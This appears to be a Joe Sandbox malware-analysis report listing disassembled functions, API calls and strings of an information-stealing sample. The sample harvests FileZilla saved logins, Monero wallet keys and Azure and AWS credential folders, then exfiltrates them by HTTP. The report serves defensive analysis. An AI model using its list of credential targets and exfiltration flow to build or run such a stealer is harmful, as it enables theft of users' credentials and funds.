                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      Function 003E0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003E8E0B
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003D99EC
                        • Part of subcall function 003D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003D9A11
                        • Part of subcall function 003D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003D9A31
                        • Part of subcall function 003D99C0: ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
                        • Part of subcall function 003D99C0: LocalFree.KERNEL32(003D148F), ref: 003D9A90
                        • Part of subcall function 003D99C0: CloseHandle.KERNEL32(000000FF), ref: 003D9A9A
                        • Part of subcall function 003E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003E8E52
                      • GetProcessHeap.KERNEL32(00000000,000F423F,003F0DBA,003F0DB7,003F0DB6,003F0DB3), ref: 003E0362
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E0369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 003E0385
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E0393
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 003E03CF
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E03DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 003E0419
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E0427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003E0463
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E0475
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E0502
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E051A
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E0532
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E054A
                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 003E0562
                      • lstrcat.KERNEL32(?,profile: null), ref: 003E0571
                      • lstrcat.KERNEL32(?,url: ), ref: 003E0580
                      • lstrcat.KERNEL32(?,00000000), ref: 003E0593
                      • lstrcat.KERNEL32(?,003F1678), ref: 003E05A2
                      • lstrcat.KERNEL32(?,00000000), ref: 003E05B5
                      • lstrcat.KERNEL32(?,003F167C), ref: 003E05C4
                      • lstrcat.KERNEL32(?,login: ), ref: 003E05D3
                      • lstrcat.KERNEL32(?,00000000), ref: 003E05E6
                      • lstrcat.KERNEL32(?,003F1688), ref: 003E05F5
                      • lstrcat.KERNEL32(?,password: ), ref: 003E0604
                      • lstrcat.KERNEL32(?,00000000), ref: 003E0617
                      • lstrcat.KERNEL32(?,003F1698), ref: 003E0626
                      • lstrcat.KERNEL32(?,003F169C), ref: 003E0635
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,003F0DB2), ref: 003E068E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 1942843190-555421843
                      • Opcode ID: fe0ba998bff6f290d753d436053f76a2baad6e5ccdd373ce82c7c4d1f21cb984
                      • Instruction ID: 1135ea9bb34844d9c777bf31bcd812f8f908d63fcabc6d420d0d0a91bcb7738c
                      • Opcode Fuzzy Hash: fe0ba998bff6f290d753d436053f76a2baad6e5ccdd373ce82c7c4d1f21cb984
                      • Instruction Fuzzy Hash: F1D16F75900258ABCB06EBF5DD96EFE7739AF14300F448619F502AA0D1DF74BA06CB62
                      Function 003D5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003D4839
                        • Part of subcall function 003D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003D4849
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003D59F8
                      • StrCmpCA.SHLWAPI(?,0108E978), ref: 003D5A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003D5B93
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0108E838,00000000,?,0108A610,00000000,?,003F1A1C), ref: 003D5E71
                      • lstrlen.KERNEL32(00000000), ref: 003D5E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 003D5E93
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003D5E9A
                      • lstrlen.KERNEL32(00000000), ref: 003D5EAF
                      • lstrlen.KERNEL32(00000000), ref: 003D5ED8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 003D5EF1
                      • lstrlen.KERNEL32(00000000,?,?), ref: 003D5F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 003D5F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 003D5F4C
                      • InternetCloseHandle.WININET(00000000), ref: 003D5FB0
                      • InternetCloseHandle.WININET(00000000), ref: 003D5FBD
                      • HttpOpenRequestA.WININET(00000000,0108E7F8,?,0108E0E8,00000000,00000000,00400100,00000000), ref: 003D5BF8
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • InternetCloseHandle.WININET(00000000), ref: 003D5FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                      • String ID: "$"$------$------$------
                      • API String ID: 874700897-2180234286
                      • Opcode ID: d5410a6d087c8570322e2e976fd8b683e9a7817cdd33a98069751d29eed22ec3
                      • Instruction ID: 375372bbf3ff134052532174738f249b18add0a921433aa85107494fb0a2a41f
                      • Opcode Fuzzy Hash: d5410a6d087c8570322e2e976fd8b683e9a7817cdd33a98069751d29eed22ec3
                      • Instruction Fuzzy Hash: 11123F72820568AADB16EBA1DC95FEEB379BF14700F014299F106660D2EF703B49CF65
                      Function 003DCEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003E8B60: GetSystemTime.KERNEL32(003F0E1A,0108A3A0,003F05AE,?,?,003D13F9,?,0000001A,003F0E1A,00000000,?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003E8B86
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003DCF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003DD0C7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003DD0CE
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD208
                      • lstrcat.KERNEL32(?,003F1478), ref: 003DD217
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD22A
                      • lstrcat.KERNEL32(?,003F147C), ref: 003DD239
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD24C
                      • lstrcat.KERNEL32(?,003F1480), ref: 003DD25B
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD26E
                      • lstrcat.KERNEL32(?,003F1484), ref: 003DD27D
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD290
                      • lstrcat.KERNEL32(?,003F1488), ref: 003DD29F
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD2B2
                      • lstrcat.KERNEL32(?,003F148C), ref: 003DD2C1
                      • lstrcat.KERNEL32(?,00000000), ref: 003DD2D4
                      • lstrcat.KERNEL32(?,003F1490), ref: 003DD2E3
                        • Part of subcall function 003EA820: lstrlen.KERNEL32(003D4F05,?,?,003D4F05,003F0DDE), ref: 003EA82B
                        • Part of subcall function 003EA820: lstrcpy.KERNEL32(003F0DDE,00000000), ref: 003EA885
                      • lstrlen.KERNEL32(?), ref: 003DD32A
                      • lstrlen.KERNEL32(?), ref: 003DD339
                        • Part of subcall function 003EAA70: StrCmpCA.SHLWAPI(01088F80,003DA7A7,?,003DA7A7,01088F80), ref: 003EAA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 003DD3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                      • String ID:
                      • API String ID: 1956182324-0
                      • Opcode ID: 915608a433d38909fb3d9803dd4354a40a25da62697460c621b42ab540713dd0
                      • Instruction ID: 90519a171b2dfd2b13d9f0acccf671829dddaff815c48a055b20206ebf1cd386
                      • Opcode Fuzzy Hash: 915608a433d38909fb3d9803dd4354a40a25da62697460c621b42ab540713dd0
                      • Instruction Fuzzy Hash: 6BE16F72910158ABCB06EBE1DD96EEE7779BF14300F054219F107AA0D2DE34BE06CB62
                      Function 003DC990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0108CFA0,00000000,?,003F144C,00000000,?,?), ref: 003DCA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 003DCA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 003DCA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 003DCAA8
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 003DCAD9
                      • StrStrA.SHLWAPI(?,0108CEE0,003F0B52), ref: 003DCAF7
                      • StrStrA.SHLWAPI(00000000,0108CEF8), ref: 003DCB1E
                      • StrStrA.SHLWAPI(?,0108D6A0,00000000,?,003F1458,00000000,?,00000000,00000000,?,01088E70,00000000,?,003F1454,00000000,?), ref: 003DCCA2
                      • StrStrA.SHLWAPI(00000000,0108D740), ref: 003DCCB9
                        • Part of subcall function 003DC820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 003DC871
                        • Part of subcall function 003DC820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 003DC87C
                      • StrStrA.SHLWAPI(?,0108D740,00000000,?,003F145C,00000000,?,00000000,01088EB0), ref: 003DCD5A
                      • StrStrA.SHLWAPI(00000000,01089200), ref: 003DCD71
                        • Part of subcall function 003DC820: lstrcat.KERNEL32(?,003F0B46), ref: 003DC943
                        • Part of subcall function 003DC820: lstrcat.KERNEL32(?,003F0B47), ref: 003DC957
                        • Part of subcall function 003DC820: lstrcat.KERNEL32(?,003F0B4E), ref: 003DC978
                      • lstrlen.KERNEL32(00000000), ref: 003DCE44
                      • CloseHandle.KERNEL32(00000000), ref: 003DCE9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                      • String ID:
                      • API String ID: 3744635739-3916222277
                      • Opcode ID: ffb0dee488d762f55b3bde9ae5f7eddd761f495b068973aa85bb3ec1ac5483cf
                      • Instruction ID: b1511a9bc00c8b743caa4a2412c4f0449ae5ff6074d26ff0769e5767883b144b
                      • Opcode Fuzzy Hash: ffb0dee488d762f55b3bde9ae5f7eddd761f495b068973aa85bb3ec1ac5483cf
                      • Instruction Fuzzy Hash: EEE14071810558ABDB16EBE1DC91FEEB779AF14300F054259F1066B1D2EF307A4ACB62
                      Function 003E8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      • RegOpenKeyExA.ADVAPI32(00000000,0108B3E8,00000000,00020019,00000000,003F05B6), ref: 003E83A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003E8426
                      • wsprintfA.USER32 ref: 003E8459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003E847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E8499
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $%s\%s$?
                      • API String ID: 3246050789-3278919252
                      • Opcode ID: 4bf00cf86ed6f49f2a834d11f8708c8a85bd4ad1d1096553d99334b7ea744540
                      • Instruction ID: 3f83140235a9213154f4fda35dc3e57727f336a7646bc1c5d0f5b25824618d7e
                      • Opcode Fuzzy Hash: 4bf00cf86ed6f49f2a834d11f8708c8a85bd4ad1d1096553d99334b7ea744540
                      • Instruction Fuzzy Hash: 84814C7191116CABEB29DF61CC81FEAB7B9FF08700F008299E109A6180DF716B85CF91
                      Function 003E4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003E8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 003E4DB0
                      • lstrcat.KERNEL32(?,\.azure\), ref: 003E4DCD
                        • Part of subcall function 003E4910: wsprintfA.USER32 ref: 003E492C
                        • Part of subcall function 003E4910: FindFirstFileA.KERNEL32(?,?), ref: 003E4943
                      • lstrcat.KERNEL32(?,00000000), ref: 003E4E3C
                      • lstrcat.KERNEL32(?,\.aws\), ref: 003E4E59
                        • Part of subcall function 003E4910: StrCmpCA.SHLWAPI(?,003F0FDC), ref: 003E4971
                        • Part of subcall function 003E4910: StrCmpCA.SHLWAPI(?,003F0FE0), ref: 003E4987
                        • Part of subcall function 003E4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003E4B7D
                        • Part of subcall function 003E4910: FindClose.KERNEL32(000000FF), ref: 003E4B92
                      • lstrcat.KERNEL32(?,00000000), ref: 003E4EC8
                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 003E4EE5
                        • Part of subcall function 003E4910: wsprintfA.USER32 ref: 003E49B0
                        • Part of subcall function 003E4910: StrCmpCA.SHLWAPI(?,003F08D2), ref: 003E49C5
                        • Part of subcall function 003E4910: wsprintfA.USER32 ref: 003E49E2
                        • Part of subcall function 003E4910: PathMatchSpecA.SHLWAPI(?,?), ref: 003E4A1E
                        • Part of subcall function 003E4910: lstrcat.KERNEL32(?,0108E948), ref: 003E4A4A
                        • Part of subcall function 003E4910: lstrcat.KERNEL32(?,003F0FF8), ref: 003E4A5C
                        • Part of subcall function 003E4910: lstrcat.KERNEL32(?,?), ref: 003E4A70
                        • Part of subcall function 003E4910: lstrcat.KERNEL32(?,003F0FFC), ref: 003E4A82
                        • Part of subcall function 003E4910: lstrcat.KERNEL32(?,?), ref: 003E4A96
                        • Part of subcall function 003E4910: CopyFileA.KERNEL32(?,?,00000001), ref: 003E4AAC
                        • Part of subcall function 003E4910: DeleteFileA.KERNEL32(?), ref: 003E4B31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                      • API String ID: 949356159-974132213
                      • Opcode ID: 97a0d58c23a03e6bb3667c0441e0505f14d7bcfed289e9c459fe3a8b0051ecd6
                      • Instruction ID: 0b9342a0e789e59c4cd0638f8f8630e7a112b9b264e66ff22e2df86d0816eee3
